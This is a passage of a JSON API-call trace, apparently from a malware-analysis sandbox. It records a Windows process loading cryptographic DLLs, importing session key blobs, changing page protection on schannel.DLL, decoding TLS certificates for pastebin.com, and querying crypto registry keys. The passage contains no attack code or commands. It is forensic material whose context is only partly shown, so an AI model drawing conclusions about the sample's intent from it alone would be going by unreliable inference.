                "value": "0x7ffecb1a0000"
              }
            ],
            "repeated": 0,
            "id": 1478
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee0574501",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ncryptsslp.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecb1a0000"
              }
            ],
            "repeated": 0,
            "id": 1479
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee0574501",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffecb1a0000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\system32\\ncryptsslp.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1480
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffee05741ce",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ncryptsslp.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecb1a0000"
              },
              {
                "name": "FunctionName",
                "value": "GetSChannelInterface"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecb1a1990"
              }
            ],
            "repeated": 0,
            "id": 1481
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee14e6f25",
            "parentcaller": "0x7ffee14e4f88",
            "category": "device",
            "api": "NtDeviceIoControlFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000178"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\KsecDD"
              },
              {
                "name": "IoControlCode",
                "value": "0x00390400"
              },
              {
                "name": "InputBuffer",
                "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00S\\x00H\\x00A\\x001\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "OutputBuffer",
                "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00A\\x001\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffS\\x00H\\x00A\\x001\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00s\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1482
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee14e2199",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\bcryptprimitives.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1390000"
              }
            ],
            "repeated": 0,
            "id": 1483
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee14e2199",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffee1390000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\system32\\bcryptprimitives.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1484
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffee14e1bc4",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "bcryptPrimitives.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1390000"
              },
              {
                "name": "FunctionName",
                "value": "GetHashInterface"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee13a4460"
              }
            ],
            "repeated": 1,
            "id": 1485
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee14e6f25",
            "parentcaller": "0x7ffee14e4f88",
            "category": "device",
            "api": "NtDeviceIoControlFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000178"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\KsecDD"
              },
              {
                "name": "IoControlCode",
                "value": "0x00390400"
              },
              {
                "name": "InputBuffer",
                "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00M\\x00D\\x005\\x00\\x00\\x00"
              },
              {
                "name": "OutputBuffer",
                "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x005\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffM\\x00D\\x005\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00s\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1486
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffee14e1bc4",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "bcryptPrimitives.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1390000"
              },
              {
                "name": "FunctionName",
                "value": "GetHashInterface"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee13a4460"
              }
            ],
            "repeated": 1,
            "id": 1487
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee14e6f25",
            "parentcaller": "0x7ffee14e4f88",
            "category": "device",
            "api": "NtDeviceIoControlFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000178"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\KsecDD"
              },
              {
                "name": "IoControlCode",
                "value": "0x00390400"
              },
              {
                "name": "InputBuffer",
                "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00A\\x00E\\x00S\\x00\\x00\\x00"
              },
              {
                "name": "OutputBuffer",
                "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00S\\x00\\x00\\x00\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffA\\x00E\\x00S\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x00\\x00\\x00\\x00\\x00\\x00\\x00K\\x00e\\x00y\\x00L\\x00e\\x00n\\x00g\\x00t\\x00h\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00"
              }
            ],
            "repeated": 0,
            "id": 1488
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d5d000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1489
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffee14e1bc4",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "bcryptPrimitives.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1390000"
              },
              {
                "name": "FunctionName",
                "value": "GetCipherInterface"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee13a9910"
              }
            ],
            "repeated": 0,
            "id": 1490
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffecb1a2af2",
            "parentcaller": "0x7ffee057220a",
            "category": "crypto",
            "api": "BCryptImportKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyBlob",
                "value": "0\\x02\\x00\\x00KSSM\\x02\\x00\\x01\\x00\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xcf\\xbb\\xa4\\x10+\\xc3\\xcf\\xbbzx\\xb7\\xf6\\xf1\\xd5\\xfb]\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xbb\\xa4\\x10+\\xc3\\xcf\\xbbzx\\xb7\\xf6\\xf1\\xd5\\xfb]\\xcd\\xb4\\xe8\\xb1\\xe6w'\n\\x9c\\x0f\\x90\\xfcm\\xdak\\xa1\\x98\\xcb\\xda\\x8d~\\xbc\\xfd\\x87\\xe2\\xb3m{\\x8fi\\x06\\xdae\\xa4\\x8d\\xfe\\x1b\\x18py\\xf9\\xab\\x1d\\x02v\\xc2\\x1b\\xd8H\\x0b\\xec\\xc6S\\x13\\x9c\\xbf\\xaa\\xb8\\x81\\xbd\\xdcz\\x9ae\\x82\\xb3\\xa1@\\xd1\\xa0=\\xff{\\x18\\xbcB\\xa7b&'\\x08Dm\\x1c\\xd9\\xe4P\\xe3\\xa2\\xfc\\xec\\xa1\\x05\\x9e\\xca\\x86C0)w\\x9a\\xd4y\\x948(\\x955=\\xb6_\\xb3\\x8d\\xffDP\\x17+=\\xc4/\\x03\\xa8\\xf1\\x12\\xb5\\xf7BC\\x97h\\x99T\\xbcU]{\\xbf\\xfd\\xaci\n\n\\xee\\x12\\xf0@`FL\\x15==\\xf3\\xe8\\x91T\\xf9\\xe2\\x7fJ\\+\\x18:}\\xe0G\\x97& \\x04\\xebd\\x9d\\x95"
              },
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "CryptKey",
                "value": "0x05d5ec50"
              },
              {
                "name": "Length",
                "value": "560"
              }
            ],
            "repeated": 0,
            "id": 1491
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d60000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1492
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffecb1a2af2",
            "parentcaller": "0x7ffee057220a",
            "category": "crypto",
            "api": "BCryptImportKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyBlob",
                "value": "0\\x02\\x00\\x00KSSM\\x02\\x00\\x01\\x00\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x10\\x00\\x00\\x00T\\x05\\x81+8\\xf8\\x94>\\x1c\\xb7\\xd1\\xbbz\\xb8\\x00\\x19\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00T\\x05\\x81+8\\xf8\\x94>\\x1c\\xb7\\xd1\\xbbz\\xb8\\x00\\x199fU\\xf1\\x01\\x9e\\xc1\\xcf\\x1d)\\x10tg\\x91\\x10m\\xba\\xacit\\xbb2\\xa8\\xbb\\xa6\\x1b\\xb8\\xcf\\xc1\\x8a\\xa8\\xa2\\xc0nS\\x0c{\\\\xfb\\xb7\\xddGCx\\x1c\\xcd\\xeb\\xdau\\x87\\x04\\x90\\x0e\\xdb\\xff'\\xd3\\x9c\\xbc_\\xcfQW\\x85\\xb4\\xdc\\x93\\x1a\\xba\\x07l=i\\x9b\\xd0b\\xa6\\xca\\x87\\xe7\\xe0\\xcb\\x07>Z\\xcck\\x033W\\xbba\\x95\\x9d<\\x86\\xfe C\\x14\\xa4\\xec(\\x17\\x97\\xbb\\x93v\\x02&\\xaf\\xf0\\x89Y\\xcfc-\\xb5\\xe7t\\xba\\x0et\\x02\\xb8(\\xdb\\xf2\\xa6\\xe0F\\x0f\\x8bU\\xa1{1[\\xd5y\\x89s\\x0e\\x8b\\x1fK{\\xa8\\x94\\x1e\\xda\\xd3\\xa5E\\x0f\\xaa,6\\x01!\\xf0Q\\x0e\\xa0\\xa0:\\x82\\x1c\\xf4x\\x87\\xcd\\xe6\\xee\\x9f\\xe8"
              },
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "CryptKey",
                "value": "0x05d5f990"
              },
              {
                "name": "Length",
                "value": "560"
              }
            ],
            "repeated": 0,
            "id": 1493
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfb33000"
              },
              {
                "name": "ModuleName",
                "value": "schannel.DLL"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1494
          },
          {
            "timestamp": "2025-11-20 10:58:35,344",
            "thread_id": "1596",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfb33000"
              },
              {
                "name": "ModuleName",
                "value": "schannel.DLL"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1495
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bb1210",
            "parentcaller": "0x7ffee0bac99e",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\MSASN1"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0690000"
              }
            ],
            "repeated": 0,
            "id": 1496
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bb1210",
            "parentcaller": "0x7ffee0bac99e",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03\\xa60\\x82\\x03L\\xa0\\x03\\x02\\x01\\x02\\x02\\x11\\x00\\xfc_eMG\\x92\\xa06\\x0eoE4\\xb9\\xf3\\x11\\xe70\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x020;1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Google Trust Services1\\x0c0\n\\x06\\x03U\\x04\\x03\\x13\\x03WE10\\x1e\\x17\r251119161223Z\\x17\r260217171220Z0\\x171\\x150\\x13\\x06\\x03U\\x04\\x03\\x13\\x0cpastebin.com0Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04\t\\xd6\\xc7\\xed\\x85GCf\\x9b|p\\xd2\\x95\\xe4\\xfb\\x87\\xa8\\xb8\\xca\\x86E\\x1d5Qu7\\xdeA%\\xae\\x1cS\\x03\\x8b\\xa6\\xf7wT\\xfb\\xf9\\xa7Oh\\xe6,\\x8c l\\xcf\\x16\\xa2\\x1e)b\\xa8v%\\x88e\\xdbl\\x8c\\x80\\xe2\\xa3\\x82\\x02"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1497
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bb1210",
            "parentcaller": "0x7ffee0bac99e",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x02\\x9f0\\x82\\x02%\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x7f\\xf3\\x19w\\x97,\"Jv\\x15]\\x13\\xb6\\xd6\\x85\\xe30\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030G1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\"0 \\x06\\x03U\\x04\n\\x13\\x19Google Trust Services LLC1\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bGTS Root R40\\x1e\\x17\r231213090000Z\\x17\r290220140000Z0;1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Google Trust Services1\\x0c0\n\\x06\\x03U\\x04\\x03\\x13\\x03WE10Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04o\\xcd:\\xfegWGL!\\x03\\x85@\\xc2G]\\xbbXG\\x0f@"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1498
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bb1210",
            "parentcaller": "0x7ffee0bac99e",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03z0\\x82\\x02b\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x7f\\xe50\\xbf3\\x13C\\xbe\\xdd\\x82\\x16\\x10I=\\x8a\\x1b0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x1e\\x17\r231115034321Z\\x17\r280128000042Z0G1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\"0 \\x06\\x03U\\x04\n\\x13\\x19Google Trust Services LLC1\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bGTS Root R40v0\\x10\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x05+"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1499
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe549",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID"
              },
              {
                "name": "Handle",
                "value": "0x00000538"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID"
              }
            ],
            "repeated": 0,
            "id": 1500
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5f4",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000538"
              },
              {
                "name": "SubKey",
                "value": "EncodingType 0"
              },
              {
                "name": "Handle",
                "value": "0x0000053c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0"
              }
            ],
            "repeated": 0,
            "id": 1501
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbec4c",
            "parentcaller": "0x7ffee0bbe6a7",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000053c"
              },
              {
                "name": "SubKey",
                "value": "CryptDllFindOIDInfo"
              },
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo"
              }
            ],
            "repeated": 0,
            "id": 1502
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "1.3.6.1.4.1.311.10.3.37!7"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7"
              }
            ],
            "repeated": 0,
            "id": 1503
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe7b1",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000540"
              },
              {
                "name": "SubKey",
                "value": "1.3.6.1.4.1.311.10.3.37!7"
              },
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7"
              }
            ],
            "repeated": 0,
            "id": 1504
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe9c3",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000544"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "1"
              },
              {
                "name": "MaxValueNameLength",
                "value": "4"
              },
              {
                "name": "MaxValueLength",
                "value": "70"
              }
            ],
            "repeated": 0,
            "id": 1505
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
